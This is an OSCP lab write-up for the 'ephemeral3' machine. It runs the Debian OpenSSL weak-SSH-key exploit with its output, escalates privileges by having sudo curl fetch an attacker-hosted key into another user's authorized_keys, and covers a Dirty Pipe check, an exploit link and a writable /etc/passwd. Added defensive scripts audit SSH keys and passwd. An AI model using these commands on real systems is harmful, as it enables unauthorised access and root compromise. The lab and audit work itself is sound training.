OSCP Lab
Lab overview
Machine: ephemeral3 | Difficulty: easy | Techniques: OpenSSL weak SSH key exploitation, sudo curl privilege escalation, CVE-2022-0847 privilege escalation, /etc/passwd write
Information gathering
Host discovery
nmap -sn 192.168.1.0/24
Port scanning
┌──(root㉿kali)-[~]
└─# nmap -sV -A -p- -T4 192.168.1.69
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-03-01 02:51 EST
Nmap scan report for 192.168.1.69
Host is up (0.0023s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 f0:f2:b8:e0:da:41:9b:96:3b:b6:2b:98:95:4c:67:60 (RSA)
| 256 a8:cd:e7:a7:0e:ce:62:86:35:96:02:43:9e:3e:9a:80 (ECDSA)
|_ 256 14:a7:57:a9:09:1a:7e:7e:ce:1e:91:f3:b1:1d:1b:fd (ED25519)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
MAC Address: 08:00:27:83:2D:83 (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.8
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE
HOP RTT ADDRESS
1 2.30 ms 192.168.1.69
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 14.30 seconds
Directory scanning
gobuster dir -w /opt/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -u http://192.168.1.69 -x html,txt,php -e
gobuster dir -w /opt/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -u http://192.168.1.69/agency -x html,txt,php -e
Gaining access
Following the hint found above, use searchsploit to look up the OpenSSL SSH vulnerability, or search for it in an exploit database:
https://www.exploit-db.com/exploits/5720
Check the script's usage requirements; the following key archive must be downloaded first:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/5622.tar.bz2
We also need the SSH username; pick a few names from the hint file and the website and test each one.
if len(sys.argv) < 4:
print './exploit.py <dir> <host> <user> [[port] [threads]]'
print ' <dir>: Path to SSH privatekeys (ex. /home/john/keys) without final slash'
print ' <host>: The victim host'
print ' <user>: The user of the victim host'
print ' [port]: The SSH port of the victim host (default 22)'
print ' [threads]: Number of threads (default 4) Too big numer is bad'
└─# python2 5720.py ./rsa/2048 192.168.1.69 randy 22 5
-OpenSSL Debian exploit- by ||WarCat team|| warcat.no-ip.org
Tested 210 keys | Remaining 32558 keys | Aprox. Speed 42/sec
Tested 412 keys | Remaining 32356 keys | Aprox. Speed 40/sec
Tested 623 keys | Remaining 32145 keys | Aprox. Speed 42/sec
Tested 828 keys | Remaining 31940 keys | Aprox. Speed 41/sec
Tested 1031 keys | Remaining 31737 keys | Aprox. Speed 40/sec
Tested 1240 keys | Remaining 31528 keys | Aprox. Speed 41/sec
Tested 1475 keys | Remaining 31293 keys | Aprox. Speed 47/sec
Tested 1682 keys | Remaining 31086 keys | Aprox. Speed 41/sec
Tested 1895 keys | Remaining 30873 keys | Aprox. Speed 42/sec
Tested 2101 keys | Remaining 30667 keys | Aprox. Speed 41/sec
Tested 2307 keys | Remaining 30461 keys | Aprox. Speed 41/sec
Tested 2518 keys | Remaining 30250 keys | Aprox. Speed 42/sec
Tested 2729 keys | Remaining 30039 keys | Aprox. Speed 42/sec
Tested 2948 keys | Remaining 29820 keys | Aprox. Speed 43/sec
Tested 3146 keys | Remaining 29622 keys | Aprox. Speed 39/sec
Tested 3370 keys | Remaining 29398 keys | Aprox. Speed 44/sec
Tested 3565 keys | Remaining 29203 keys | Aprox. Speed 39/sec
Tested 3786 keys | Remaining 28982 keys | Aprox. Speed 44/sec
Tested 4002 keys | Remaining 28766 keys | Aprox. Speed 43/sec
Tested 4218 keys | Remaining 28550 keys | Aprox. Speed 43/sec
Tested 4430 keys | Remaining 28338 keys | Aprox. Speed 42/sec
Tested 4645 keys | Remaining 28123 keys | Aprox. Speed 43/sec
Tested 4850 keys | Remaining 27918 keys | Aprox. Speed 41/sec
Tested 5059 keys | Remaining 27709 keys | Aprox. Speed 41/sec
Tested 5254 keys | Remaining 27514 keys | Aprox. Speed 39/sec
Tested 5458 keys | Remaining 27310 keys | Aprox. Speed 40/sec
Tested 5663 keys | Remaining 27105 keys | Aprox. Speed 41/sec
Tested 5866 keys | Remaining 26902 keys | Aprox. Speed 40/sec
Tested 6083 keys | Remaining 26685 keys | Aprox. Speed 43/sec
Tested 6278 keys | Remaining 26490 keys | Aprox. Speed 39/sec
Tested 6480 keys | Remaining 26288 keys | Aprox. Speed 40/sec
Tested 6704 keys | Remaining 26064 keys | Aprox. Speed 44/sec
Tested 6940 keys | Remaining 25828 keys | Aprox. Speed 47/sec
Tested 7147 keys | Remaining 25621 keys | Aprox. Speed 41/sec
Tested 7347 keys | Remaining 25421 keys | Aprox. Speed 40/sec
Tested 7544 keys | Remaining 25224 keys | Aprox. Speed 39/sec
Tested 7751 keys | Remaining 25017 keys | Aprox. Speed 41/sec
Tested 7951 keys | Remaining 24817 keys | Aprox. Speed 40/sec
Tested 8148 keys | Remaining 24620 keys | Aprox. Speed 39/sec
Tested 8349 keys | Remaining 24419 keys | Aprox. Speed 40/sec
Tested 8570 keys | Remaining 24198 keys | Aprox. Speed 44/sec
Tested 8788 keys | Remaining 23980 keys | Aprox. Speed 43/sec
Tested 9000 keys | Remaining 23768 keys | Aprox. Speed 42/sec
Tested 9226 keys | Remaining 23542 keys | Aprox. Speed 45/sec
Tested 9449 keys | Remaining 23319 keys | Aprox. Speed 44/sec
Tested 9675 keys | Remaining 23093 keys | Aprox. Speed 45/sec
Tested 9889 keys | Remaining 22879 keys | Aprox. Speed 42/sec
Tested 10110 keys | Remaining 22658 keys | Aprox. Speed 44/sec
Tested 10322 keys | Remaining 22446 keys | Aprox. Speed 42/sec
Key Found in file: 0028ca6d22c68ed0a1e3f6f79573100a-31671
Execute: ssh -lrandy -p22 -i ./rsa/2048/0028ca6d22c68ed0a1e3f6f79573100a-31671 192.168.1.69
Tested 10500 keys | Remaining 22268 keys | Aprox. Speed 35/sec
Using the exploit we recover the matching SSH key and log in successfully:
ssh -lrandy -p22 -i ./rsa/2048/0028ca6d22c68ed0a1e3f6f79573100a-31671 192.168.1.69
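The login above works because the key set is small enough to brute-force, which is why the defensive response to this class of bug is a blocklist of known-bad key fingerprints (Debian shipped such blocklists with ssh-vulnkey). The following is an added example, not code from the original post: it parses an authorized_keys file, computes the OpenSSH-style SHA256 fingerprint of each key, and flags any key on a blocklist. The key blobs, the blocklist contents and the account names are constructed for the example; a real deployment would load the blocklist from a file.

```python
import base64
import binascii
import hashlib
import struct


def ssh_string(b: bytes) -> bytes:
    """Encode one length-prefixed string in SSH wire format (RFC 4251)."""
    return struct.pack(">I", len(b)) + b


def build_rsa_blob(e: int, n: int) -> bytes:
    """Build an ssh-rsa public key blob from e and n.

    Used here only to construct sample keys; the moduli below are tiny
    made-up numbers, not real RSA keys.
    """
    def mpint(x: int) -> bytes:
        raw = x.to_bytes((x.bit_length() + 7) // 8, "big")
        if raw and raw[0] & 0x80:          # keep the integer positive
            raw = b"\x00" + raw
        return ssh_string(raw)
    return ssh_string(b"ssh-rsa") + mpint(e) + mpint(n)


def fingerprint(blob: bytes) -> str:
    """OpenSSH-style fingerprint: 'SHA256:' + base64 digest without padding."""
    digest = hashlib.sha256(blob).digest()
    return "SHA256:" + base64.b64encode(digest).decode().rstrip("=")


def parse_authorized_keys(text: str):
    """Yield (keytype, blob, comment) per key line.

    Blank lines and comments are skipped; a leading options field such as
    command="..." is skipped by locating the first key-type token.
    """
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        parts = line.split()
        idx = next((i for i, p in enumerate(parts)
                    if p.startswith(("ssh-", "ecdsa-", "sk-"))), None)
        if idx is None or idx + 1 >= len(parts):
            continue                        # no key material on this line
        try:
            blob = base64.b64decode(parts[idx + 1], validate=True)
        except (binascii.Error, ValueError):
            continue                        # corrupt base64, not a usable key
        yield parts[idx], blob, " ".join(parts[idx + 2:])


def audit(text: str, blocklist: set) -> list:
    """Return one finding per key with its fingerprint and blocklist status."""
    findings = []
    for keytype, blob, comment in parse_authorized_keys(text):
        fp = fingerprint(blob)
        findings.append({"type": keytype, "fingerprint": fp,
                         "comment": comment, "blocked": fp in blocklist})
    return findings


# Constructed sample data (not real keys, not a real blocklist).
WEAK_BLOB = build_rsa_blob(65537, 0xC0FFEE1234567891)
GOOD_BLOB = build_rsa_blob(65537, 0xDEADBEEFCAFEF00D)
SAMPLE_AUTHORIZED_KEYS = "\n".join([
    "# constructed sample authorized_keys",
    "ssh-rsa " + base64.b64encode(WEAK_BLOB).decode() + " randy@legacy-box",
    'command="/bin/true" ssh-rsa ' + base64.b64encode(GOOD_BLOB).decode() + " deploy",
])
BLOCKLIST = {fingerprint(WEAK_BLOB)}

if __name__ == "__main__":
    for f in audit(SAMPLE_AUTHORIZED_KEYS, BLOCKLIST):
        status = "BLOCKED" if f["blocked"] else "ok"
        print(f"{status:7} {f['type']} {f['fingerprint']} {f['comment']}")
```

Run it against every user's ~/.ssh/authorized_keys on a host to find keys that should have been rotated; the fingerprint format matches what `ssh-keygen -lf` prints, so a blocklist can be built from that tool's output.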
Privilege escalation
randy@ephemeral:~$ sudo -l
Matching Defaults entries for randy on ephemeral:
env_reset, mail_badpass, secure_path=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/bin
User randy may run the following commands on ephemeral:
(henry) NOPASSWD: /usr/bin/curl
https://gtfobins.github.io/gtfobins/curl/
We tried to read henry's private key with the following command, but it failed.
randy@ephemeral:/home/henry$ LFILE=/home/henry/.ssh/id_rsa
randy@ephemeral:/home/henry$ sudo -u henry curl file://$LFILE
Instead, generate a key pair on Kali and use curl to download the public key into henry's .ssh directory:
ssh-keygen -b 4096 -t rsa
cd .ssh
Serve it with PHP's built-in web server:
php -S 0.0.0.0:12345
sudo -u henry /usr/bin/curl 192.168.1.103:12345/id_rsa.pub -o /home/henry/.ssh/authorized_keys
Once the download succeeds, log in from Kali with the private key.
A linpeas.sh scan shows that /etc/passwd is writable, so we can add a root-privileged user to it directly.
Additional notes
Privilege escalation with CVE-2022-0847 (Dirty Pipe): first run linpeas.sh, or test with the following script:
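A writable /etc/passwd is the end of this box, and it is also one of the easiest conditions to detect. The following is an added example, not code from the original post: it audits passwd content and the file's mode, reporting group/world-writable permissions, accounts other than root with UID 0, password hashes stored in passwd instead of shadow, and malformed lines. The sample passwd lines and the hash value are constructed for the example.

```python
import os
import stat


def parse_passwd(text: str) -> list:
    """Split passwd content into dicts; malformed lines are kept and marked."""
    entries = []
    for lineno, line in enumerate(text.splitlines(), 1):
        if not line.strip() or line.startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) != 7:
            entries.append({"line": lineno, "malformed": True, "raw": line})
            continue
        name, pw, uid, gid, gecos, home, shell = fields
        entries.append({
            "line": lineno, "malformed": False, "name": name, "password": pw,
            "uid": int(uid) if uid.isdigit() else None,
            "gid": gid, "home": home, "shell": shell,
        })
    return entries


def audit_passwd(text: str, mode: int) -> list:
    """Return human-readable findings for passwd content with file mode 'mode'."""
    findings = []
    if mode & (stat.S_IWGRP | stat.S_IWOTH):
        findings.append("passwd is group- or world-writable (mode %o)" % (mode & 0o777))
    for e in parse_passwd(text):
        if e["malformed"]:
            findings.append(f"line {e['line']}: malformed entry")
            continue
        if e["uid"] == 0 and e["name"] != "root":
            findings.append(f"line {e['line']}: extra UID 0 account '{e['name']}'")
        if e["password"] == "":
            findings.append(f"line {e['line']}: '{e['name']}' has an empty password field")
        elif e["password"] not in ("x", "*", "!", "!!"):
            # Anything else is a hash stored directly in passwd, which login
            # honours and which any user with write access could have planted.
            findings.append(f"line {e['line']}: '{e['name']}' carries a password hash in passwd")
    return findings


def audit_file(path: str = "/etc/passwd") -> list:
    """Audit a real passwd file on disk."""
    with open(path) as fh:
        text = fh.read()
    return audit_passwd(text, os.stat(path).st_mode)


# Constructed sample: the 'toor' line shows what a planted root account looks
# like; the hash is a placeholder, not a real crypt(3) value.
SAMPLE_PASSWD = "\n".join([
    "root:x:0:0:root:/root:/bin/bash",
    "daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin",
    "randy:x:1000:1000:randy:/home/randy:/bin/bash",
    "toor:$6$constructed$notarealhash:0:0::/root:/bin/bash",
    "broken:x:1001",
])

if __name__ == "__main__":
    for finding in audit_passwd(SAMPLE_PASSWD, 0o100666):
        print(finding)
```

On a real host, `audit_file()` gives the same report for /etc/passwd; a clean system returns an empty list, and a baseline of the file can be compared against it after any incident.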
https://raw.githubusercontent.com/basharkey/CVE-2022-0847-dirty-pipe-checker/main/dpip.sh
#!/bin/bash
# usage
# Check current kernel ./dpipe.sh
# Check specific kernel ./dpipe.sh 5.10.102
# Note: only the upstream version string is compared; a distribution kernel that
# backports the fix without bumping the version is still reported as vulnerable.
kernel=$1
ver1=$(echo ${kernel:-$(uname -r | cut -d '-' -f1)} | cut -d '.' -f1)
ver2=$(echo ${kernel:-$(uname -r | cut -d '-' -f1)} | cut -d '.' -f2)
ver3=$(echo ${kernel:-$(uname -r | cut -d '-' -f1)} | cut -d '.' -f3)
echo $ver1 $ver2 $ver3
# Not vulnerable: anything before 5.8, and the fixed releases 5.10.102, 5.15.25
# and 5.16.11 or later (the 5.10.92 line is kept from the original script).
if (( ${ver1:-0} < 5 )) ||
(( ${ver1:-0} > 5 )) ||
(( ${ver1:-0} == 5 && ${ver2:-0} < 8 )) ||
(( ${ver1:-0} == 5 && ${ver2:-0} == 10 && ${ver3:-0} >= 102 )) ||
(( ${ver1:-0} == 5 && ${ver2:-0} == 10 && ${ver3:-0} == 92 )) ||
(( ${ver1:-0} == 5 && ${ver2:-0} == 15 && ${ver3:-0} >= 25 )) ||
(( ${ver1:-0} == 5 && ${ver2:-0} == 16 && ${ver3:-0} >= 11 )) ||
(( ${ver1:-0} == 5 && ${ver2:-0} > 16 ));
then
echo Not vulnerable
exit 0
else
echo Vulnerable
exit 1
fi
If the vulnerability is present, the following exploit can be used to escalate privileges:
https://github.com/Arinerron/CVE-2022-0847-DirtyPipe-Exploit.git
End
Originally published on the WeChat public account 贝雷帽SEC: 【OSCP】ephemeral3